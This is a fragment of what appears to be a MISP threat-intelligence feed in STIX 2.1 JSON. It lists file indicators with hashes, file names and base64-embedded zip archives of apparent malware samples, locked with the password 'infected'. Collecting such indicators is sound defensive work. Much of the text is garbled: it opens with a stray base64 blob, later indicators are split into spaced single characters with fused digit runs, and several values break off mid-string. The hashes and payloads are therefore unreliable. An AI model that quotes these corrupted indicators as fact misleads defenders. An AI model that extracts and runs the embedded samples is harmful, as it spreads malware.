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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-20T00:00:57Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-20T00:03:42.000Z" ,
"modified" : "2020-07-20T00:03:42.000Z" ,
"pattern" : "[file:hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:hashes.SHA1 = '5dc20661046ffa7cca66eb047ee01abc3ef935fa' AND file:hashes.SHA256 = 'f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6' AND file:name = 'cannot_but_soft.xsl' AND file:size = '7334' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'cannot_but_soft.xsl' AND file:content_ref.hashes.MD5 = 'afaf378fa1d6c00d71e5a01f94fd940e' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-20T00:03:42Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--7b2b9772-9059-4651-84e8-bc066e15b917" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:54.000Z" ,
"modified" : "2020-08-02T18:50:54.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 3994131 d a 9 d 0 8 a a 5 c a 8 b 4 f c 671 d 4 c 9 d b ' A N D f i l e : h a s h e s . S H A 1 = ' 55 f c 3 f 8108e5 a 563 e a 0 0 c d 3 a b c 9 a 5672 d 3 d 58 e c 5 ' A N D f i l e : h a s h e s . S H A 256 = ' e 88 d f d 4 b e f 8 c 502 e f 2 b 711 f d 0 25 a a 321244 d b c a 1 e a b 80586 b 0 7187 b 3 c f 261 d e 3 ' A N D f i l e : h a s h e s . S H A 512 = ' 0 2 f d 82498 b e f 4442 c a 0 a 6 a 5348 a 9 f 612 c 852e901522 e c 8 c 69 d 7 f 1 d f d b e 2607 c c 72 b b b 727 c 474e60314 b 1 c 5 b b 5 c 621 a 3347 b 87 b b 3 c 92 c a 2 c 194473e58 d e b f d 1 a 1 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : B K z J k u Y H x K 6 B G i K 1 k z 6 q 3 G y + 2 G c s I U o 8 E w q b w k 9 o S p : A z r 8 j B o i j + 2 G 0 B D w k o S p ' A N D f i l e : n a m e = ' 123 . b i n ' A N D f i l e : s i z e = ' 212992 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A B G W A l F s / c j J G + o C A A B A A w A g A B w A M z k 5 N D E z M W R h O W Q w O G F h N W N h O G I 0 Z m M 2 N z F k N G M 5 Z G J V V A k A A 4 E K J 1 + B C i d f d X g L A A E E I Q A A A A Q h A A A A R W Z I w F n 1 t I h 6 L E Y s a G L f q B T 8E2 o 8 D 9 F 51 x d + E k E W x y g H z g V d 0 5 K 3 d c n k F X i 7 + c d n b L + G y a 3 v k A 1 Z f 0 L X a o E + 5 y r m P J w u z m p 6 T B B d q l 9 w b 7 A Q V + k h F Y f 0 + 2 W k V X O M P 3 s 7 c Z + T 7 q p W C 8 n H + F K G g / d 393 L X I / g B W W F j F 9 e J d j 8 a E 3 R 514 O r m u f 6 n w f a I q Z M 2 H 5 n j D 6 h C x 1 p M g Q u I k Q / S U f T 9 S W Q L k 3 l I f U b Q / q / P 0 B b o n S J a W O 5 M 5 s e o f v g V W 46 F W P b 92 H B Z 3 y f l 4 f 9 o j 4 F s w / 3E1 X X R s b 5 y / 1e5 N A l G A Y K h G S D m Q 78 B o L U p T 1 z V z E x H z 7 J 0 s I f a W r 5 k f P v + a g Q x 7 K N x Q 4 T l c c f 6 M t h Y F 4 / Y E H N f 6 V T / N b 7 m f E m 1 P x E z M D k w Z V d / 8 y x w N U t e 9 O q l o O H g m K d C w A W + E 
w 9 o n 4 g U m B 0 F j P A S S O L T o f B Z g y R j o f 9 z N e 3 L D i Q h D N S X u U N T g u J t u D C I E D F I 2 m r f 9 e a T t J c / M O K Y j H U f O q W F v X J L J c C 4 t a P q F 2 N h A 9 q w K F h W O M 8 + a 6 f E e v h 9 S s 69 f + d O O 8322 o 1 U b c U G 4 W 3 Q o 1 l N K M B x Z e k U S 5 E v T 4 v Q 0 m 2 x F 0 M t L X p z A q T k Y I v t U v S j B U E J E U p L e v L z 3 L 4 F k W + F L M Z N i q 4 u f 6 W 7 + g r r F P x p 8 W q w x 5 e H 91 + / U k L U s e p C V q m X 3 r L T z 4 d i F C M Z 4 I 3 C p O b g l b 4 M C l 7 s O D p P N 6 O t E x k 7 Y e f u H C 0 p y z x t K J v I c V y W z 7 U 5 I r x K I m i C d V 483 I g V p O q Y A a M U N R H E p P x G N z k Z f / 8 J h B C s K V 8 e g H X W k 4 W p T B z b Q B s t e 6 J S K i c R i X l 1 a r G a a 4 P H O B a R K z L N J W O 2 i / d B M E a 6 k F B F h / v P 600 l Q T 5 C h V y 81 M 9 Z J u V 4 I 3 M h x o h e b F i E g r y 55 l d R 0 p X 8 K H x x O f C y V l 8 o U 2 s W + g 3 U V 3 T d Y P t Z a F U O D B 8 Q L g U v l T b l o m 7 E Q N 9 b / W 2 R c w M / F e y D x d N d E O C d i x 1 z / P x f i 6 y 5 d q 6 d 3 E C Z O F j u 1 i / u t f M r 0 a I M 60 L n L + + h a R A l r q S N O x 7 g F S Y l n m H Z Y U S 4 Y W Q 1 G 0 w o i L J / l 1 N e / B C v 6 r p A I 2 W C K + I v 5 R g F s 67 z V M W q s t P S 3 S Z a / + 47 c x G q k C M K S 9 x r I o d m K x J 5 Z M I 9 P s L p 6 x Q / w J o u Y w 4 r i 8 R p T Y d L W W 87 d P I o 8 n f G Q W G K Q c X m 5 l L T V t r x Y g A I T l Q J L X N 5 R z m k B U x O q n 6 W k L 55 M L h d V 4 W f R 1 q q + C q w o i 4 E Z 3 R e v x 3 j S P k + 2 D I o R n 7 H J F U B F 49 C y B f R P S E c f j H 3 / X P r J q O y s + 19 L A c X S u I S V m F S h c D C H 0 i 8 V 2 O 4 n I u R z z t + n n 8 c B u P 9 L K S m r A Y L e 0 R v H 8 G x M K q 4 m z 9 F O B f l T X g 0 Q X 84 j F n P E U a U k R y / 8 a A Q v m q + t 4 Z 4 F 9 G 5 W 0 y i o V E B q E u x p X H t E a 4 y B x l x R B b c 9 N t W c A X I 0 x Z R B Z G Q z a m 6 O c h 2 B z e l + k p M z + 
4 Q r q C l 9 d Y 7 Q 6 D U 63 w + d x f 1 a Y j o X J + y X X J G d l i V y W x 5 f k k r h V s v z J s W R b + C L 45 e u x / K M l s 6 q L 6 x n 2 v k 6 s L q l j J o X 1 H 1 A 2 A / F y s p Y E h 4 H c U J 37 F R C w a M j W b W a Y S W f n 5 W + D L k v f B e q l b h t k 8 C L / f L N r x T C n T W e 0 n U Z b 7 D D j i e q a v Z t m D K e I o r g i y 0 z 2 C I Z 0 4 N R 7 j d o I H R y O m + u / l D O U m h N W A F m A X n 6 o S s i U 2 n e E N k U b H g b / p 1 Z f I Q K Q 8 B Z l o 6 E F + V 7 X M Z 88 K k b d Z H B G u W w k Y f N j r g G 3 B G p k r 3 k U c x T i 0 M p J y x Q V t D O T a I U J 7 o g Z A V 5 U X O 6 V c Y J B X l f w t + y p p k v 6 m 2 d / 6 D R M H W 291 g r o B m h h E H u b o W 7 S Q 2 f f J g G t o I W 1 + h N F b D y P V C Q Q 5 K N H o O H g Y 6 f D G z B l j y B / 7 y o p j 9 S K w + f Z 9 P Y U f f 1 U B Q w / S G s c X U K H o F g L M P / d R A c m D G c d z s V / 7 G L e Z i T Y a k E 7 k J w A O a d 9 u d A 86 K A y H f k 4E25 R X 3 u r c d 53 c E c 7 V A T Q e V U 3447 b T p 2 K Z U Q / J 0 O 8 m j r U Y C + N Z N j 9 P u t 3 N b M a 2 r 2 X W u R d a c C C R 4 D z G 9 V 9 s C O L q l 9 N y n l 93 f p U Y A F R A 3 I J D 61 g l 3 Q O D L P A J l 6 z g 1 c m / F N A 0 D k T P 5 F K t 55 J S z t X + r G W M V q / J 6 c G 7 V Y s 7 v e Z x r H z I G t 3 S 2 k i 9 / x c Z q 3 O a J S 9 V D 8 a D T v T t Q P e m F g Y 0 2e1 j w 2 Q g K D T u b L J 8 H T w e 0 6 Q N / n I O c W P E 37 Q d j o p k 0 M w W q Z g e R w r 7 L L m b 7 N N F D Q 220 D C 9 Z 377 h L b b 5 J D p J u e 64 k I l H w n W V v b C P s n R p o I y s + 51 p K h 9 j M 76 k U h p s r E z o s 7 A u w s k s o N 8 p l Y X m Y z x Y W X H 5 Y O P 9 + 96 Z 3 j h Y I o o d N 6 d K R o m C R j U q d S X B h y V z b Q 15 p y c i V 7 E R V A J Y 5 + r C 277 u T e J 4 F x / p I S G R q e E f L h u T 0 Z i O X F X M I Z Z U X G B a k E P t M V 0 / q n P E 9 m 8 o / V E 7 t q b X y 4 b M L p k z W 9 i B l V T b q A g e 2 C Z A G R Z l 5 S F O t H d T v R T A J C H O 8 a N 0 57 
i t K o F 4 q x s 62 v x c k G x P p X D U i 6 E z N Q 53 M D O K o 0 u F v e c U 0 M c y b / K g S k 4 n l m P / M L b w T j d V + n E t q l d 73 H 66 v 9 P O X w f c f / 7 O j p L F D Z 6 Z U C V t 2 D e b 5 M x 0 l e P b c d 4 e A w n o q p e K Y q A 7 R i Y Q 0 m 8 l 456 H p + 1 i Y a z b O 9 Q 8 / 6 L m I Y I F M W r 5 X 5 m i u 99 q k 1 C R W 1 g L z d M U J F 8 K g S 1 A k d m i e n l 6 m n j c 0 B g L d l P 7 k b G I 5 K Y c Z N D E K 2 o 9 Y w Q z W W l 0 D Z L W t o 6 B Z h 5 y k L s m P d a j L F + n S Z H 1 E n N 9 K a + U k 2 C F V W n u l r 4 w D K b L 2 S A 7 f d G A / Q j A z 5 W m 0 u k s 32 v A P I m l J p S e k f X l m l l g v N S C K g 8 b D Z x 3 f g 3 G S Y G r o l N Q R B P l H F u N 5 b 9 K K 4 T R k h I n q w X 8 Q r K 3 Z P u / o 0 K 8 + a J 6 K H R 11 i 4 + e q Z O / b h P U H t 2 c M N v N d w a g X R D b I t 0 3 j 2 Y l / C Z B 7 E c m y H K o E E H D / 6 q f b n n G m J a a P h F m l t U C e j x 0 v D B t q R w E + L g x 8 z i 7 N c J a M F B K y e s x a r P p q t C 5 g 4 i u 1 J / t + w T T x l 95 M z k V 9 A l 1 Q P s 4 u P 3 h o S / Y h o P B 807 z D / u k I 59 t y 8 b E b R K l n X q r W C U V v J + t 8 N W 4 L 7 C s t 3 w + b 9 A x d S 2 s k x a T v 2 x Y P L 3 r a f p X b v 2 G C n K F H x K A h e u G U X p r 1 U B S h + 4 o t S O D L S 1 x v + z o E L 6 f l R 7 x p h f J M i l g D b 8 h H E j Q I N D w S q L N K + b w E O l Y e 8 X Z V Q / x X V n l h 7 C A H Z N t d D 1 Z 36 l r a / + y u v W v b V a L 9 z A m U 8 Z r 1 q T A j Y D z n P M m d 3 h P z 6 t 4 O O A G P E X W / M p p I l a 6 y v 8 L B z o s L 3 b H / t J z p t o w 3 s u K D b q P c W R 6 s j N a U P O c V 9 P Y / 5 u p q e X q d G a 1 P N z i S T l t O P 7 e y + d e Y 9 P X T h Z W q 8 V X 682 Y t U U v i K I p w s R w C P O A g w f j H z M 6 / J j w W Q Q T D V w / T f g P b P x A u + 4 s E z s p e t i a j s b U w p P F I 7 y r a H B 7 k P s q o 54 n b L o + i P 4 O g l Q v T
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-02T18:50:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:50:54.000Z" ,
"modified" : "2020-08-02T18:50:54.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 3994131 d a 9 d 0 8 a a 5 c a 8 b 4 f c 671 d 4 c 9 d b ' A N D f i l e : h a s h e s . S H A 1 = ' 55 f c 3 f 8108e5 a 563 e a 0 0 c d 3 a b c 9 a 5672 d 3 d 58 e c 5 ' A N D f i l e : h a s h e s . S H A 256 = ' e 88 d f d 4 b e f 8 c 502 e f 2 b 711 f d 0 25 a a 321244 d b c a 1 e a b 80586 b 0 7187 b 3 c f 261 d e 3 ' A N D f i l e : h a s h e s . S H A 512 = ' 0 2 f d 82498 b e f 4442 c a 0 a 6 a 5348 a 9 f 612 c 852e901522 e c 8 c 69 d 7 f 1 d f d b e 2607 c c 72 b b b 727 c 474e60314 b 1 c 5 b b 5 c 621 a 3347 b 87 b b 3 c 92 c a 2 c 194473e58 d e b f d 1 a 1 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : B K z J k u Y H x K 6 B G i K 1 k z 6 q 3 G y + 2 G c s I U o 8 E w q b w k 9 o S p : A z r 8 j B o i j + 2 G 0 B D w k o S p ' A N D f i l e : n a m e = ' 123 . b i n ' A N D f i l e : s i z e = ' 212992 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A C W W A l F s / c j J G + o C A A B A A w A g A B w A M z k 5 N D E z M W R h O W Q w O G F h N W N h O G I 0 Z m M 2 N z F k N G M 5 Z G J V V A k A A 6 Y K J 1 + m C i d f d X g L A A E E I Q A A A A Q h A A A A A 6 x M W e 1 l a m A + t Z T d 8 U P w H V 53 v r W B V D k 7 k i k 36 v f l 2 N m W b B F 7 h t C C q H p R F a r Q o u J O z 0 / E q q R C H 3 v d S K I 38 H a 4 H g Z V q D v g 9 b l q G X + 0 F S C 23 M 9 y q Y S r + R x u q Z 3 y W k g l q c j 36 e / 6 V 0 y b S N W + 4 F f p k j f v K + H B 7 m n e T l C B a v w a L C Q e H c y w h D s 3 h 4 y q / t t 2 X b M s w z A L f V J r r D S D y r o / O m W O m q i t H L G U l C R O i K 39 V f G F Y A o V Q u K 9 A t p p j y K q d 6 V z n R v H V Z v c 7 D w g A g h v b B K / b S P 0 D A 7 R F Q 76 P O 4 B T Z Y L p o 3 h x V b T q l D Z r z U C k w S K 4 T F P 6 O 4 z j z a N I D b g g m W X + I p P k J 4 A P C 2 n b x E + q j k 87 d x X 0 a t a A 9 q B L 6 d S v S M P o 485 y T v c U C 3 t F C g X N O h 6 g 2 V 88 o N H 1 M V 1 h f i G 4 D h Y Q 
D e I d j 5 U M 0 q D u s P x N 0 V L z 9 i i 4 a v i p M 3 Z V + e Z O g o 73 Y x t 7 W g c 4 N R G 3 p T o X N j T 9 / 2 k 49 t g i c C W 0 V 7 e c f K y Z L y U 46 S 1 A d c 1 v n X q + F G N V t U V a O X j 6 A G m g 1 O w D 7 B L O 0 Q 4 r y L u h U A k q z o F v T y 2 Z / c M 3 x W S v J u V D F 0 a H N m y S s t S q a G M h B y / 6 u D H 5 J 0 l w e j R Y T k + 3 m J 8 j n Q T E j A z k / f p A C x q j F l 2 t 7 f 8 a o i H 2 y o + l O T c 3 S 5 K f W L E 64 W 5 c V 6 Q n q 8 Y K + V O c N c Y V R W Y k 0 P P M v e R G I 6 N S X G u O V N 8 Z T X 9 c 15 q P k Q H j x 6 i N 76 n R i C n o K l f q J F x T 9 v n P j x n C v k 3 n C K Z o 9 r 9 r s 2 a e U M 7 n X X h R D v V v U I 0 o W h r 4 a z M s q j W k t 9 v v x k g i E W 84 H W s + D W 0 S F I y 7 n I Y r 1 r f H 4 X L U 0 w W i C N A Y c W t I p 8 g + f N C A l h 2 + r s E / j Y C m M y W H 8 x U 29 c p O Y 0 o l Q 7 g G g + X D f G B p E p s u X Y 3 f R o Z e j Q R I P Z B K A k d / 7 q j O E i 2 c 2 V o / n a R m A K h M b V h 6 + h 6 l 4 F r m R M f M c 1 F q c j 91 E G c / b K X Q v K a I 4 u L y t Z d Q 2 p o Z A c o R 3 B N / u T x A q k A x K 9 U D m N F D 86 u + w H w 88 S + g B + X y f R K j u g M 0 M f / H v I y q f D 1 s G A S u x r Y V h Y + V N W q B W P N W E Z g A D Y J F Q u O U 8 q h t z i 2 / 9 q R Z K 3 r h s d X O t F K A 9 K C T 2 r Y W y b B 6 L E v p h s R D h g S A x Q s b 8 G w b O o R R / e l r C 9 K B L c 5 X i Q K r x z C T i A N q k v d U E j p + p U j e m D 5 e q C s T z p 0 O W z L f H h 9 / g V 0 f f I 8 / U P A R L O y B T o W 9 a n F w g J D 2 i m D d / o + l 36 k G c 4 / X g 3 O 4 c 65 L X b 9 S 8 m v h s 4 p P J s o K 5 t t c + x + P 9 e J 47 F N D M e n R J f n H K u c v s + m W 8 + G r L 7 F m E L t 6 Q s O R U 7 S w i z D J v K 3 i Q t b D o d h P z J E s 0 w 0 Y y R c Q + o P z A X N + g N O S G G Y n q + Z P O d u 7 c 94 n J 6 O w A a j q 16 X k O k S w P e 0 B 5 Z x V h H B Y g v W n Y K R J E c o X C w J V C H a S i E K L c l M b T f s F 9 e y r J D H Q X 1 V l 
u s 21 M 4 / J e M V 29 I u L D g L o B O k x e X J p 3 t j h u b e Z P S d x C / E 8 D H d F m U G c M n o 0 f p Y n C Q N k 4 G O W Q z N j S J 8 Q C E 9 V N p s h W S A r I w J 7 F n p i 4 k D 5 d 709 y U W k I o t v 4 X / 6 m E F 18 L 6 I H e k f C V P y K e a n b 0 L J 2 H B 6 Y c 0 s l o 7 k 2 g e o j b F J k T E k a J T 6 U Z F A k F 7 A m c o W K N J d V B s d m S M v l C W w x 3 Z O / g 3 R 9 c E r o N L b x C i z N e R A + W W T m 6 l b 0 Y O B T h D Y m 5 o g m b j U o 5 U S O s D g y 2 I 0 P k q h b T V d T / U S n v N M e j / 6 O T N K H + T s m i z 8 n f P u P p u 600 H 83 z h y b q c 9 R L W i n u a d b K u k J P 4 P d 1 e x k I 54 e f 7 X E i F J l k a F s d g Y c 0 N u m S O I C 1 m h q B D D x b H g N H 44 h A 8 + s 4 D 0 u h s x + + H + 2 q W p b 6 Y C U 4 P o K Y s U M H j C f c s n e c P B 7 E O S 1 L O Q i M h Q s T 6 I g J Q d z G K c O n Q j A d K K X i i H / 0 K E c U Y d S 4 g I T k G T 97 Z I I g f F 3 G w l e j L m n 1 L 5 f 8 h A N C V F x E D T + 8 B J 8 S 8 r G I p m O G 4 T 9 q 7 y A K c F / Z e N 3 H B J f e B G 7 O T N E z H I C P j x b S A C I x Y m 9 d 7 g f S a N N q R H m 15 E K y U p T A 10 c + o p u J K I r H l x L 17 s 8 O u 3 B e 8 z b p l V o 5 K 9 P C U n o U 9 x t A A E z Q C A M / y f y x + 88 R g i o k 2 R L q l J b s F I R L t Y i 5 O z H 2 + q U J f / b o L J d q s e v G y d G o Q z 